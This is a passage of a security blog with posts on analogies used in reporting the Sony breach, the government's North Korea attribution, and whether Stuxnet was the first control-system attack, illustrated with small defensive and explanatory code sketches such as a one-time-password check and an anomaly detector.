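To put the bulkhead point another way, here is a toy sketch (my framing, not anything from the BBC piece or Sony) of the difference between segmentation that only contains and segmentation that also escalates:

    # Toy decision function: what happens when a breach is detected in one segment.
    def respond(segment, alerting_segments, policy="escalate"):
        actions = ["isolate " + segment]              # close the bulkhead
        if policy == "contain-and-sail":
            return actions                            # Titanic mode: keep going
        # Escalation mode: one local leak triggers a whole-ship assessment
        actions.append("notify captain")              # the decision stays with leadership
        actions += ["inspect " + s for s in alerting_segments if s != segment]
        actions.append("reassess course and speed")   # slow down, maybe stop
        return actions

    # Hypothetical segment names, for illustration only
    print(respond("playstation", ["playstation", "studio", "corp-it"]))
    print(respond("playstation", ["playstation"], policy="contain-and-sail"))

Same tool, opposite outcomes: the second call is the “we’ve got bulkheads, keep going” answer that turns a repairable leak into a sinking.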

Another way of looking at the problem

The rest of the article runs through a mix of several theories.

One theory mentioned is to delete data to avoid breaches. This is good specific advice, not good general advice. If we were talking about running out of storage room, people might look at deletion as a justified option. If the data is not necessary to keep and carries a clear risk (e.g. fines for retaining post-authorization payment card data), then there is a case to be made. And in the case of regulation, the data to be deleted is well defined. Otherwise deleting poorly defined data actually can make things worse, through rebellion.

A company tells its staff that the servers will be purging data and you know what happens next? Staff start squirreling away data on every removable storage device and cloud provider they can find, because they still see that data as valuable and necessary to be successful, and there’s no real penalty for them. Moreover, telling everyone to delete email that may incriminate is awkward strategy advice (e.g. someone keeps a copy and you delete yours, leaving you without anything to dispute their copy). Also, it may be impossible to ask this of environments where data is treated as a formal and permanent record. People in isolation could delete too much or the wrong stuff, discovered too late by upper management. Does that risk outweigh the unknown potential of breach? Pushing a risk decision away from the captain of a ship and into bulkheads without good communication can lead to Titanic miscalculations.

Another theory offered is to encrypt and manage keys perfectly. Setting aside perfect anything-management, encryption is seriously challenged by an imposter event like Sony. A person inside an environment can grab keys. Once they have the keys, they have to be stopped by requiring other factors of identification. Asking the imposter to provide something they have or something they are is where the discussion often will go: stronger authentication controls, both to prevent attacks from spreading and to help alert management to a breach in progress. Achieving this tends to require better granularity in data (fewer bulkheads) and also more of it (fewer deletions). The BBC correctly pointed out that there is a balance, yet by this point the article is such a mess it could say anything in conclusion.
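
To make the “something they have” factor concrete, here is a minimal sketch of a time-based one-time password check (RFC 6238), the mechanism behind most authenticator apps. It is my illustration, not anything from the BBC article or Sony’s environment, and it uses only the Python standard library:

    import base64, hashlib, hmac, struct, time

    def totp(secret_b32, interval=30, digits=6):
        # Derive the current one-time code from a shared base32 secret
        key = base64.b32decode(secret_b32, casefold=True)
        counter = int(time.time()) // interval            # moving time window
        msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
        digest = hmac.new(key, msg, hashlib.sha1).digest()
        offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    # A stolen encryption key alone no longer ends the game: the verifier
    # also demands this rolling code from a device the imposter does not hold.
    print(totp("JBSWY3DPEHPK3PXP"))  # hypothetical demo secret

The point is not that one-time passwords are a cure; it is that an imposter holding stolen keys now also needs a device-bound secret, which buys defenders detection time.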

What I am saying here is: think carefully about threats and solutions if you want to manage them. Do not settle on glib statements that get repeated without much thought or explanation, let alone evidence. Containment can work against you if you do not manage it well, adding cost and turning a small breach into a terminal event. A boat obviously will use any number of technologies, new and old, to keep things dry and productive inside. A lot of what is needed relates to common sense about looking and listening for feedback. This is not to say you need some super guru as captain; rather, it is the opposite. You need people committed to improvement, to reporting when things are not as they should be, in order to achieve a well-run ship.

Those are just some quick examples and how I would position things differently. Nation-states are not always in a better position; often they are hindered. Attackers have weaknesses and commitments. Finding a way to make them stop is not impossible. And ultimately, throwing around analogies is GREAT, as long as they are not incomplete or applied incorrectly. I hope that helps clarify how to use a little common sense to avoid the errors being made in journalists’ stories on the Sony breach.

Posted in Security.


Gov Fumbles Over-Inflated Sony Hack Attribution Ball

This (draft) post basically comes after reading one called “The Feds Got the Sony Hack Right, But the Way They’re Framing It Is Dangerous” by Robert Lee. Lee stated:

At its core, the debate comes down to this: Should we trust the government and its evidence or not? But I believe there is another view that has not been widely represented. Those who trust the government, but disagree with the precedent being set.

Lee is not the only person in government referring to this as the core of the debate. It smacks of being forced by those in government to choose one side or the other, for or against them. Such a binary depiction of governance, such a call for obedience, is highly politically charged. Do not accept it.

I will offer two concepts to help with the issue of choosing a path.

  1. Trust but Verify (As Reagan Used to Tell Gorbachev)
  2. Agile and Social/Pair Development Methods

So here is a classic problem: non-existent threats get over-inflated because of secret forums and debates. Bogus reports and false pretenses could very well be accidents, to be quickly corrected, or they may be used intentionally to justify policies and budgets, requiring more concerted protest.

If you know the spectrum, are you actually helping improve trust in government overall by working with them to eliminate error or correct bias? How does trusting government and its evidence, while also wanting to improve government, fit into the sides Lee quotes? It seems far more complicated than writing off skeptics as distrustful of government. It also has been proven that skeptics help preserve trust in government.

Take a moment to look back at a false attribution blow-up of 2011:

Mimlitz says last June, he and his family were on vacation in Russia when someone from Curran Gardner called his cell phone seeking advice on a matter and asked Mimlitz to remotely examine some data-history charts stored on the SCADA computer.

Mimlitz, who didn’t mention to Curran Gardner that he was on vacation in Russia, used his credentials to remotely log in to the system and check the data. He also logged in during a layover in Germany, using his mobile phone. …five months later, when a water pump failed, that Russian IP address became the lead character in a 21st-century version of a Red Scare movie.

Everything deflated after the report was investigated thanks to public attention. Given the political finger-pointing that came out afterwards, it is doubtful that incident could have received appropriate attention in secret meetings. In fact, much of the reform of agencies, and of how they handle investigations, has come as a result of public criticism of results.

Are external skepticism and interest/pressure the key to improving trust in government? Will we achieve more accurate analysis through more parallel and open computations? The “Big Data” community says yes. More broadly speaking, given how widely the Aktenzeichen XY … ungelöst “help police solve crimes” TV show has been emulated since it started in 1967, the general population probably would agree as well.

Trust but Verify

British Prime Minister Margaret Thatcher famously once quipped “Standing in the middle of the road is very dangerous; you get knocked down by the traffic from both sides.” Some might take this to mean it is smarter to go with the flow. As Lee highlighted, they say pick a side: either for trust in government or against it. Actually, it often turns out to be smarter to reject this analogy.

Imagine flying a plane. Which “side” do you fly on when you see other planes flying in no particular direction? Thatcher was renowned for false-choice risk management, a road with only two directions where everyone chooses sides without exception. She was adamantly opposed to Gorbachev tearing down the wall, for example, because it did not fit her over-simplified risk management theory. Verification of safety is so primitive in her analogy as to be worthless to real-world management.

Asking for verification should be a celebration of government and trust. We trust our government so much, we do not fear to question its authority. Auditors, for example, look for errors or inconsistencies in companies without being seen as a threat to trust in those companies. Executives further strengthen trust through skepticism and inquiry.

Consider for a moment an APT (really, no pun intended) study called “Decisive action: How businesses make decisions and how they could do it better“. It asked “when taking a decision, if the available data contradicted your gut feeling, what would you do?”

APT-doubt

Releasing incomplete data could reasonably be expected to generate 90% push-back for more data or more analysis, according to this study. Those listening to the FBI claim that North Korea is responsible probably have a gut feeling contradicting the data. That gut feeling is more “are we supposed to accept incomplete data as proof of something? Because been there, done that; let’s keep going” than it is “we do not trust you”.

In the same study 38% said decisions are better when more people are involved, and 38% said more people did not help, so quantity alone isn’t the route to better outcomes. Quality remains a factor, so there has to be a reasonable bar to input, as we have found in Big Data environments. The remaining 25% in the survey could tip the scale on this point, yet they said they were still collecting and reanalyzing data.

My argument here is you can trust and you still can verify. In fact, you should verify where you want to maintain or enhance trust in leadership. Experts definitely should not be blandly labelled as anti-government (the 3% who ignore) when they ask for more data or do reanalysis (the 90% who want to improve decision-making).

Perhaps Mitch Hedberg put it best:

I bought a doughnut and they gave me a receipt for the doughnut. I don’t need a receipt for a doughnut. I just give you the money, you give me the doughnut. End of transaction. We don’t need to bring ink and paper into this. I just can not imagine a scenario where I had to prove I bought a doughnut. Some skeptical friend. Don’t even act like I didn’t get that doughnut. I got the documentation right here. Oh, wait it’s back home in the file. Under D.

We have many doughnut scenarios with government. Decisions are easy: pick a doughnut, eat it. At least 10% of the time we may even eat a doughnut when our gut instinct says not to, because the impact seems manageable. The Sony cyberattack, however, is complicated, with potentially huge/unknown impact, and is exactly where people SHOULD imagine a scenario requiring proof. It’s more likely in the 90% range, where an expert simply going along with it would be exhibiting poor leadership skills.

So the debate actually boils down to this: should the governed be able to call for accountability from their government without being accused of a complete lack of trust? Or, perhaps more broadly, should the governed have the means to immediately help improve the accuracy and accountability of their government, providing additional resources and skills to make their government more effective?

Agile and Social/Pair Development Methods

In the commercial world we have seen a massive shift in IT management from waterfall and staged progress (e.g. environments with rigorously separated development, test, ready, release, production) to developers frequently running operations. Security in operations has had to keep up and in some cases lead the evolution.

Given the context above, where embracing feedback loops leads to better outcomes, isn’t government also facing the same evolutionary path? The answer seems obvious. Yes, of course government should be inviting criticism and be prepared to adapt and answer, moving development closer to operations. Criticism could even become more manageable by nature of a process in which it occurs more frequently, in response to smaller updates.

Back to Lee’s post, however: he suggests an incremental or shared analysis would be a path to disaster.

The government knew when it released technical evidence surrounding the attack that what it was presenting was not enough. The evidence presented so far has been lackluster at best, and by its own admission, there was additional information used to arrive at the conclusion that North Korea was responsible, that it decided to withhold. Indeed, the NSA has now acknowledged helping the FBI with its investigation, though it still unclear what exactly the nature of that help was.

But in presenting inconclusive evidence to the public to justify the attribution, the government opened the door to cross-analysis that would obviously not reach the same conclusion it had reached. It was likely done with good intention, but came off to the security community as incompetence, with a bit of pandering.

[…]

Being open with evidence does have serious consequences. But being entirely closed with evidence is a problem, too. The worst path is the middle ground though.

Lee shows us a choice based on the false pretense of two sides and a middle full of risk. Put this in the context of IT. Take responsibility for all the flaws and you delay code forever. Give away all responsibility for flaws and your customers go somewhere else. So you choose a reasonable release schedule that has removed major flaws while inviting feedback to iterate and improve before the next release. We see software continuously shifting towards the more agile model, away from internal secret waterfalls.

Lee gives his ultimate example of danger.

This opens up scary possibilities. If Iran had reacted the same way when it’s nuclear facility was hit with the Stuxnet malware we likely would have all critiqued it. The global community would have not accepted “we did analysis but it’s classified so now we’re going to employ countermeasures” as an answer. If the attribution was wrong and there was an actual countermeasure or response to the attack then the lack of public analysis could have led to incorrect and drastic consequences. But with the precedent now set—what happens next time? In a hypothetical scenario, China, Russia, or Iran would be justified to claim that an attack against their private industry was the work of a nation-state, say that the evidence is classified, and then employ legal countermeasures. This could be used inappropriately for political posturing and goals.

Frankly this sounds NOT scary to me. It sounds par for the course in international relations. The 1953 US decision to destroy Iran’s government at the behest of UK oil investors was the scary and ill-conceived reality, as I explained in my Stuxnet talk.

One thing I repeatedly see Americans fail to realize is that the world looks in at America playing a position of strength unlike others, jumping into “incorrect and drastic consequences”. Internationally, the party believed most likely to leap without support tends to be the one that perceives itself as having the most power, using an internal compass instead of true north.

What really is happening is that those in American government, especially in the intelligence and military communities, are trying to make sense of how to achieve a position of power for cyber conflict. Intelligence agencies seek to accumulate the most information, while those in the military contemplate definitions of winning. The two are not necessarily in alignment, since some definitions of winning can have a negative impact on the ability to gather information. And so a power struggle is unfolding, with test scenarios indispensable to those wanting to establish precedent and indicators.

This is why moving towards a more agile model, away from internal secret waterfalls, is a smart path. The government should be opening up to feedback, engaging the public and skeptics to find definitions in unfamiliar space. Collecting and analyzing data are becoming essential skills in IT because they are the future of navigating a world without easy Thatcher-ish “sides” defined. Lee concludes with the opposite view, which again presents binary options.

The government in the future needs to pick one path and stick to it. It either needs to realize that attribution in a case like this is important enough to risk disclosing sources and methods or it needs to realize that the sources and methods are more important and withhold attribution entirely or present it without any evidence. Trying to do both results in losses all around.

Or trying to do both could help drive a government out of the dark ages of decision-making tools. Remember the inability of a certain French general to listen to the skeptics all around him saying a German invasion through the forest was imminent? Remember how that same general refused to use radio for regular updates, sticking to a plan, unlike his adversaries on their way to overrun his territory with quickly shifting paths and dynamic plans?

Bureaucracy and inefficiency lead to strange overconfidence and comfort in “sides” rather than opening up to unfamiliar agile and adaptive thinking. We should not confuse the convenience of getting everyone pointed in the same direction with true preparation and the skills to avoid unnecessary losses.

The government should evolve away from tendencies to force complex scenarios into false binary choices, especially where social and pairing methods make analysis easy to improve. In the future, the best leaders will evaluate the most paths and use reliable methods to gradually reevaluate and adjust based on enhanced feedback. They will not “pick one path and stick to it” because situational awareness is more powerful and can even be more consistent with values (maintaining the moral high ground by correcting errors rather than doubling down).

I’ve managed to avoid making any reference to football. Yet at the end of the day isn’t this all really about an American ideal of industrialization? Run a play. Evaluate. Run another play. Evaluate. America is entering a world of cyber more like soccer (the real football), which is far more fluid and dynamic. Baseball has the same problem. Even basketball has shades of industrialization, with machine-like plays. The highly structured, top-down competitive system that America was built upon, and that it has used for conflict dominance, is facing a new game with new rules that requires more adaptability: intelligence unlocked from set paths.

Update 24 Jan: Added more original text of first quote for better context per comment by Robert Lee below.

Posted in History, Security.


Was Stuxnet the “First”?

My 2011 presentation on Stuxnet was meant to highlight a few basic concepts. Here are two:

  • Sophisticated attacks are ones we are unable to explain clearly. Spoons are sophisticated to babies. Spoons are not sophisticated to long-time chopstick users. It is a relative measure, not an absolute one. As we increase our ability to explain and use things they become less sophisticated to us. Saying something is sophisticated really is to communicate that we do not understand it, although that may be our own fault.
  • Original attacks are ones we have not seen before. It also is a relative measure, not an absolute one. As we spend more time researching and observing things, fewer things will be seen as original. In fact with just a little bit of digging it becomes hard to find something completely original rather than evolutionary or incremental. Saying something is original therefore is to say we have not seen anything like it before, although that may be our own fault.

Relativity is the key here. Ask yourself whether there is someone you could easily discuss attacks with to make them less sophisticated and less original. Is there a way to be less in awe and more understanding? It’s easy to say “oooh, spoon” and it should not be that much harder to ask “anyone seen this thing before?”

Here’s a simple thought exercise:

Given that we know critical infrastructure is extremely poorly defended, and given that we know control systems are by design simple, would an attack designed for simple systems behind simple security therefore be sophisticated? My argument is usually no: by design, the technical aspects of compromise tend to be a low bar…perhaps especially in Iran.

Since the late 1990s I have been doing assessments inside utilities and I have not yet found one hard to compromise. However, there still is a sophisticated part, where research and skills definitely are required. Knowing exactly how to make an ongoing attack invisible, and tailoring the attack to a very specific intended result, is a level above getting in and grabbing data, or even causing harm.

An even more advanced attack makes the traces and tracks of the attack invisible. So there definitely are ways to bring the sophistication and uniqueness level up substantially, from “oooh, spoon” to “I have no idea if that was me that just did that”. I believe this has become known as the Mossad-level attack, at which point defense is not about technology.

I thought with my 2011 presentation I could show how a little analysis makes major portions of Stuxnet less sophisticated and less original; certainly it was not the first of its kind and it is arguable how targeted it was as it spread.

The most sophisticated aspects to me were that it moved through many actors across boundaries (e.g. Germany, Iran, Pakistan, Israel, US, Russia), requiring knowledge of areas not easily accessed or learned. Ok, let’s face it: it turns out that thinking was on the right path, albeit with an important role reversed, and I wasn’t sure where it would lead.

A US ex-intel expert mentioned on Twitter during my talk that I had “conveniently” ignored motives. This is easy for me to explain: I focus on consequences, as motive is basically impossible to know. However, as a clue that comment was helpful. I wasn’t thinking hard enough about the economic-espionage aspect that US intelligence agencies have revealed as a motivator. Recent revelations suggest the US was angry at Germany for allowing technology into Iran. I had mistakenly thought Germany would have been working with the US, or that Israel would have been able to pressure Germany. Nope.

Alas, a simple flip of Germany’s role (critical to good analysis and unfortunately overlooked by me) makes far more sense, because Germany (less often but similar to France) stands accused of illicit sales of dangerous technology to enemies of the US and its friends. It also fits with accusations I have heard from a US ex-intel expert that someone (i.e. Atomstroyexport) tipped off the Germans, an “unheard of” first responder to research and report Stuxnet. The news cycles actually exposed Germany’s ties to Iran and potentially changed how the public would link similar or follow-up action.

But this post isn’t about the interesting social-science aspects driving a geopolitical technology fight (between Germany/Russia and Israel/US over Iran’s nuclear program); it’s about my failure to make enough of an impression to add perspective. So I will try again here. I want to address an odd tendency of people to continue to report Stuxnet as the first-ever breach of its type. This is what the BSI said in its February 2011 Cyber Security Strategy for Germany (page 3):

Experience with the Stuxnet virus shows that important industrial infrastructures are no longer exempted from targeted IT attacks.

No longer exempted? Targeted attacks go back a long way, as anyone familiar with the NIST report on the 2000 Maroochy breach should be aware.

NIST has established an Industrial Control System (ICS) Security Project to improve the security of public and private sector ICS. NIST SP 800-53 revision 2, December 2007, Recommended Security Controls for Federal Information Systems, provides implementing guidance and detail in the context of two mandatory Federal Information Processing Standards (FIPS) that apply to all federal information and information systems, including ICSs.

Note an important caveat in the NIST report:

…”Lessons Learned From the Maroochy Water Breach” refer to a non-public analytic report by the civil engineer in charge of the water supply and sewage systems…during time of the breach…

These non-public analytic reports are where most breach discussions take place. Nonetheless, there never was any exemption and there are public examples of ICS compromise and damage. NIST gives Maroochy from 2000. Here are a few more ICS attacks to consider and research:

  • 1992 Portland/Oroville – Widespread SCADA Compromise, Including BLM Systems Managing Dams for Northern California
  • 1992 Chevron – Refinery Emergency Alert System Disabled
  • 1994 Salt River – Water Canal Controls Compromised
  • 1999 Gazprom – Gas Flow Switchboard Compromised
  • 2001 California – Power Distribution Center Compromised
  • 2003 Davis-Besse – Nuclear Safety Parameter Display Systems Offline
  • 2003 Amundsen-Scott – South Pole Station Life Support System Compromised
  • 2003 CSX Corporation – Train Signaling Shutdown
  • 2006 Browns Ferry – Nuclear Reactor Recirculation Pump Failure
  • 2007 Idaho Nuclear Technology & Engineering Complex (INTEC) – Turbine Failure
  • 2009 Carrell Clinic – Hospital HVAC Compromised
  • 2013 Austria/Germany – Power Grid Control Network Shutdown

Fast-forward to December 2014, and a new breach case inside Germany comes out via the latest BSI report. It involves ICS, so the usual industry characters start discussing it.

Immediately I tweet for people to take in the long view, the grounded view, on German BSI reports.

Alas, my 2011 presentation with its history of breaches, and my recent tweets, clearly failed to sway, so I am here blogging again. I offer as an example of my failure the following headlines, which really emphasize a “second time ever” event.

That list of four in the last article is interesting. It sets it apart from the other two headlines, yet it also claims “and only the second confirmed digital attack”? That’s clearly a false statement.

Anyway Wired appears to have crafted their story in a strangely similar fashion to another site; perhaps too similar to a Dragos Security blog post a month earlier (same day as the BSI tweets above).

This is only the second time a reliable source has publicly confirmed physical damage to control systems as the result of a cyber-attack. The first instance, the malware Stuxnet, caused damage to nearly 3,000 centrifuges in the Natanz facility in Iran. Stories of damage in other facilities have appeared over the years but mostly based on tightly held rumors in the Industrial Control Systems (ICS) community that have not been made public. Additionally there have been reports of companies operating in ICS being attacked, such as the Shamoon malware which destroyed upwards of 30,000 computers, but these intrusions did not make it into the control system environment or damage actual control systems. The only other two widely reported stories on physical damage were the Trans-Siberian-Pipeline in explosion in 1982 and the BTC Turkey pipeline explosion in 2008. It is worth noting that both stories have come under intense scrutiny and rely on single sources of information without technical analysis or reliable sources. Additionally, both stories have appeared during times where the reporting could have political motive instead of factuality which highlights a growing concern of accurate reporting on ICS attacks. The steelworks attack though is reported from the German government’s BSI who has both been capable and reliable in their reporting of events previously and have the access to technical data and first hand sources to validate the story.

Now here is someone who knows what they are talking about. Note the nuance and details in the Dragos text. So I realize my problem is with a Dragos post regurgitated a month later by Wired without attribution; look at how all the qualifiers disappeared in translation. Wired looks preposterous compared to this more thorough reporting.

The Dragos opening line is a great study in how to set up a series of qualifications before stepping through them with explanations:

This is only the second time a reliable source has publicly confirmed physical damage to control systems as the result of a cyber-attack

The phrase has more qualifications than Lance Armstrong:

  • Has to be a reliable source. Not sure who decides what qualifies.
  • Has to be publicly confirmed. Does this mean a government agency, or the actual victim admitting breach?
  • Has to be physical damage to control systems. Why the control systems themselves, and not anything controlled by those systems? Because the writer runs an ICS security blog.
  • Has to result from cyber-attack. They did not say malware, so this is very broad.

Ok, Armstrong had more than four… Still, the Wired phrase by comparison uses dangerously loose adaptations and drops half of them. Wired wrote “This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment” and that’s it: two qualifications instead of four.

So we can easily say Maroochy was a wholly digital attack that caused physical destruction of equipment. We reach the Wired bar without a problem. We’d be done already, with Stuxnet proven not to be the first.

Dragos is harder. Maroochy also was from a reliable source, publicly confirmed as resulting from a packet-radio attack (arguably cyber). The only qualification left is physical damage to control systems. I think the Dragos bar is set oddly high in requiring the control systems themselves to be damaged. Granted, ICS management will consider ICS damage differently than external harms; this is true in most industries, although you would expect the opposite in ICS. To the vast majority, news of 800,000 liters of released sewage obviously qualifies as physical damage, so Maroochy would still qualify. Perhaps more to the point, the BSI report says the furnace was set to an unknown state, which caused the breakdown. Maroochy likewise had its controls manipulated into an unknown state, albeit without damaging the controls themselves.

If anyone is going to hang their hat on damage to the control systems themselves, then perhaps they should refer to it as an Aurora litmus, given the infamous DHS study of substations in 2007 (840-page PDF).

[Image: Aurora generator test]

The concern with Aurora, if I understood the test correctly, was not just to manipulate the controls. It was to “exploit the capability of modern protective equipment and cause them to serve as a destructive weapon”. In other words, use the controls that were meant to prevent damage to cause widespread damage instead. Damage to just the controls themselves, without wider effect, would be a premature end to a cyber-physical attack, albeit a warning.
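
To make that concrete, here is a toy calculation of my own (invented numbers, not the DHS test methodology): a generator islanded slightly off grid frequency drifts out of phase while its breaker is held open, and the voltage across the breaker at reclose, which drives the damaging current and torque transient, grows with the phase-angle difference.

```python
import math

# Toy numbers, not from the DHS test: a generator islanded at 60.5 Hz
# against a 60 Hz grid slips 0.5 cycles per second while the breaker
# is open.
GRID_HZ = 60.0
GEN_HZ = 60.5
SLIP_HZ = GEN_HZ - GRID_HZ

def angle_after(seconds_open: float) -> float:
    """Phase-angle difference (degrees) accumulated while the breaker is open."""
    return (360.0 * SLIP_HZ * seconds_open) % 360.0

# For equal voltage magnitudes, the voltage across the breaker at reclose
# scales with sin(delta/2), peaking at 180 degrees out of phase; the
# resulting current and torque transient is what tears up the machine.
for t in [0.1, 0.25, 0.5, 0.75, 1.0]:
    delta = angle_after(t)
    stress = math.sin(math.radians(delta) / 2.0)
    print(f"open {t:4.2f}s -> {delta:5.1f} deg out of sync, "
          f"relative reclose stress {stress:.2f}")
```

The point of the toy model is that the attacker never touches the generator directly; the protective breaker, cycled out of sync, does the damage for them.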

I’d love to dig into that BTC Turkey pipeline explosion in 2008, since I worked on that case at the time. I agree with the Dragos blog that it doesn’t qualify, however, so I have to move on. Before I do, there is an important lesson from 2008.

Suffice it to say I was on press calls and gave clear, documented evidence to those interviewed about cyber attack on critical infrastructure. For example, Georgia’s official complaint listed no damage related to cyber attack. The press instead ran a story, without doing any research, on hearsay that Russia had knocked Georgian infrastructure offline with a cyber attack. That can often be a problem with the press, and perhaps that is why I am calling Wired out here for its lazy title.

Let’s look at another example, the 2007 TCAA: from a reliable source, publicly confirmed, damage to control systems, resulting from cyber-attack:

Michael Keehn, 61, former electrical supervisor with Tehama Colusa Canal Authority (TCAA) in Willows, California, faces 10 years in prison on charges that he “intentionally caused damage without authorization to a protected computer,” according to Keehn’s November 15 indictment. He did this by installing unauthorized software on the TCAA’s Supervisory Control and Data Acquisition (SCADA) system, the indictment states.

Perfect example. Meets all four criteria. Sounds bad, right? Aha! Got you.

Unfortunately this incident turns out to be based on nothing more than an indictment turned into a news story and repeated by others without independent research. Several reporters jumped on the indictment, created a story, and then moved on. Dan Goodin probably had the best perspective, at least introducing skepticism about the indictment. I put the example here not only to trick the reader, but also to highlight how seriously I take the question of “reliable source”.

Journalists often unintentionally muddy waters (pun not intended) and mislead; they can move on as soon as a story goes cold. What stake do they really have when spinning their headline? How much accountability do they hold? Meanwhile, those of us defending infrastructure (should) keep digging for truth in these matters, because we need it for more than a talking point; we need it to improve our defenses.

I’ve read the available court documents, and they indicate a misunderstanding about software-developer copyright, which led to a legal fight, all of which has since been dismissed. In fact the accused afterwards wrote a book called “Anatomy of a Criminal Indictment” about how to successfully defend yourself in court.

In 1989 he applied for a job with the Tehama-Colusa Canal Authority, a Joint Powers Authority who operated and maintained two United States Bureau of Reclamation canals. During his tenure there, he volunteered to undertake development of fully automated control of the Tehama-Colusa Canal, a 110-mile canal capable of moving 2,000 cfs (cubic feet of water per second). It was this development, which he volunteered to undertake, that resulted in a criminal indictment under Title 18, Part I, Chapter 47, Section 1030 (Fraud and related activity in connection with computers). He would be under indictment for three years before the charges were dismissed. During these three years he was very proactive in his own defense and learned a lot that an individual not previously exposed would not know about. The defense attorney was functioning as a public defender in this case, and yet, after three years the charges were dismissed under a motion of the prosecution.

One would think reporters would jump at the chance to highlight the dismissal, or promote the book. Sadly the only news I find is about the original indictment. And so we still find the indictment listed by information-security references as an example of ICS attack, even though it was not. Again, props to the Dragos blog for being skeptical about prior events. I still say that, aside from Maroochy, we can prove Stuxnet was not the first public case.

The danger in taking the wide view is that it requires understanding far more details and doing deeper research to avoid being misled. The benefit, as I pointed out at the start, is that we significantly raise the bar for what is considered a sophisticated or original attack.

In my experience Stuxnet is a logical evolution, an application of accumulated methods within a context already well documented and repeatedly warned about. I believe putting it back into that context makes it more accessible to defenders. We need better definitions of physical damage and of cyber, let alone reputable sources, before throwing around firsts and seconds.

Yes, malware that deviates from normal can be caught, even unfamiliar malware, if we observe and respond quickly to abnormal behavior. Calling Stuxnet the “first” will perhaps garner more attention, which is good for eyeballs on headlines. However, it also delays people from realizing how it fits a progression: is the adversary introducing never-before-seen tools and methods, or are they just extremely well practiced with what we already know?

The latest studies suggest how easy, almost trivial, it would be for security analysts monitoring traffic as well as operations to detect Stuxnet. Regardless of the 0day, the more elements of behavior are monitored, the more an attacker has to scale their effort. Companies like ThetaRay have been built on this exact premise: to automate and reduce the cost of the measures a security analyst would use to protect operations. (It is already a crowded market.)
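
Here is a minimal sketch of that premise. The metric (writes-per-minute to PLC registers), window, and threshold are all invented for illustration, not any vendor’s actual method: baseline what normal operations look like, then flag deviations for an analyst, no malware signature required.

```python
# Minimal sketch of behavior monitoring: compare each new sample to a
# rolling baseline and flag large deviations. Hypothetical numbers.
from statistics import mean, stdev

def flag_anomalies(samples, window=20, threshold=3.0):
    """Yield (index, value, zscore) where a value deviates from the
    rolling baseline by more than `threshold` standard deviations."""
    for i in range(window, len(samples)):
        baseline = samples[i - window:i]
        mu, sigma = mean(baseline), stdev(baseline)
        if sigma == 0:
            continue  # perfectly flat baseline; skip in this toy version
        z = (samples[i] - mu) / sigma
        if abs(z) > threshold:
            yield i, samples[i], z

# e.g. writes-per-minute to PLC registers: steady operations, then the
# kind of burst that reprogramming a controller would produce
writes = [4, 5, 4, 6, 5, 4, 5, 5, 6, 4,
          5, 4, 6, 5, 5, 4, 5, 6, 4, 5, 48]
for i, value, z in flag_anomalies(writes):
    print(f"minute {i}: {value} writes (z={z:.1f}) -- investigate")
```

Stuxnet famously reprogrammed controllers and replayed recorded sensor readings; sustained bursts of unexpected controller writes are exactly the kind of deviation a baseline like this surfaces, which is the sense in which detection becomes almost trivial once someone is actually watching.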

That’s the way I presented it in 2011, and little has changed since then. Perhaps the most striking attempt to make Stuxnet stand out that I have heard lately came from ex-USAF staff; paraphrasing him, Stuxnet was meant to be to Iran what the atom bomb was to Japan: a weapon of mass destruction to change the course of war and be apologized for later.

It would be interesting if I could agree with that argument. I do not. But if I did, then perhaps I could point out that recent research, based on Japanese and Russian first-person accounts, suggests the USAF was wrong about Japan. Fear of nuclear assault, let alone mass casualties and destruction from the bombs, did not end the war with Japan; rather, leadership gave up hope two days after the Soviets entered the Pacific Theater. And that should really make you wonder about people who say we should be thankful for the consequences of either malware or bombs.

But that is obviously a blog post for another day.

Please find below some references for further reading, all of which put Stuxnet in broad context rather than treating it as the “first”:

N. Carr, Development of a Tailored Methodology and Forensic Toolkit for Industrial Control Systems Incident Response, US Naval Postgraduate School, 2014

A. Nicholson, S. Webber, S. Dyer, T. Patel, and H. Janicke, SCADA Security in the Light of Cyber-Warfare, 2012

C. Wueest, Targeted Attacks Against the Energy Sector, Symantec, 2014

B. Miller and D. Rowe, A Survey of SCADA and Critical Infrastructure Incidents, SIGITE/RIIT, 2012

Posted in Energy, History, Security.